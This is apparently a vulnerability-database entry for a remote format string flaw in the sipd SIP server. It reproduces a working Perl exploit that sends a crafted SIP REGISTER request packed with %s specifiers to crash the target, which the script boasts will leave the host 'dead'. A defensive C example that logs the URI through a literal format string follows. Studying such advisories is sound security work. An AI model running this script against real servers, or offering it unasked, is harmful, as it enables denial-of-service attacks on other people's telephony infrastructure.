SX Design sipd 0.1.2/0.1.4 – Remote Format String

Vulnerability ID 1054302 Vulnerability type
Published 2003-12-16 Updated 2003-12-16
CVE ID N/A
CNNVD-ID N/A
Platform Multiple CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/23444
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/9236/info

sipd has been reported prone to a format string vulnerability that may be triggered remotely. It has been reported that sip URI arguments passed to the affected server are not sufficiently handled. An attacker may place format specifiers in the URI and they will be handled literally, potentially allowing the attacker to read from and write to arbitrary memory.

#!/usr/bin/perl

# SIPd - SIP Password Format String
# Kills sipd version 0.1.4 and prior

use IO::Socket;
use strict;

unless (@ARGV == 2 || @ARGV == 3) { die "usage: $0 host your_ip [port]\n" }

my $remote_host = shift(@ARGV);
my $your_host = shift(@ARGV);
my $port = shift(@ARGV);
if ($port eq "")
{
 $port = "5060";
}

my $buf = "REGISTER sip::%s%s%s%s%s%s%s%s%s%s%s%s%s%s\@$remote_host SIP/2.0\r
Via: SIP/2.0/UDP $your_host:3277\r
From: \"STORM\" <sip:$your_host:3277>\r
To: <sip:$your_host:3277>\r
Call-ID: 12312312\@$your_host\r
CSeq: 1 OPTIONS\r
Max-Forwards: 70\r
\r\n";

my $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n";
my $ipaddr = inet_aton($remote_host) || $remote_host;
my $portaddr = sockaddr_in($port, $ipaddr);

send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";

print "Now, '$remote_host' must be dead :)\n";
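
The class of bug in the description above is fixed by never letting request text act as a format string. The following C sketch is an added example, not sipd's code and not part of the original advisory: it extracts the Request-URI, flags any '%' that is not a %HH escape, and logs the URI through a literal format. The function names, buffer sizes and the example.invalid host are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Copy the Request-URI (second token of a SIP request line) into out.
 * Returns 0 on success, -1 if the line is malformed or the URI does not fit. */
int sip_request_uri(const char *line, char *out, size_t outlen)
{
    const char *start = strchr(line, ' ');
    if (start == NULL)
        return -1;
    start++;
    size_t n = strcspn(start, " \r\n");
    if (n == 0 || n >= outlen || start[n] != ' ')
        return -1;
    memcpy(out, start, n);
    out[n] = '\0';
    return 0;
}

/* RFC 3261 allows '%' in a URI only as a %HH escape. Returns 1 if every '%'
 * is followed by two hex digits, else 0. Detection signal only: "%dd" passes
 * it, so it does not replace the literal format string in log_request(). */
int uri_escapes_valid(const char *uri)
{
    for (const char *p = strchr(uri, '%'); p != NULL; p = strchr(p + 3, '%'))
        if (!isxdigit((unsigned char)p[1]) || !isxdigit((unsigned char)p[2]))
            return 0;
    return 1;
}

/* Build a log entry. The format string is a literal and the URI is only an
 * argument, so specifiers inside it are copied out as plain text.
 * Returns the snprintf length, or -1 for a malformed request line. */
int log_request(const char *line, char *logbuf, size_t loglen)
{
    char uri[256];
    if (sip_request_uri(line, uri, sizeof uri) != 0)
        return -1;
    return snprintf(logbuf, loglen, "uri=\"%s\" escapes_ok=%d", uri, uri_escapes_valid(uri));
}

int main(void)
{
    char logbuf[320];
    /* Constructed sample line; example.invalid is a placeholder host. */
    if (log_request("REGISTER sip:%s%s%s@example.invalid SIP/2.0\r\n", logbuf, sizeof logbuf) > 0)
        puts(logbuf);
    return 0;
}
```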
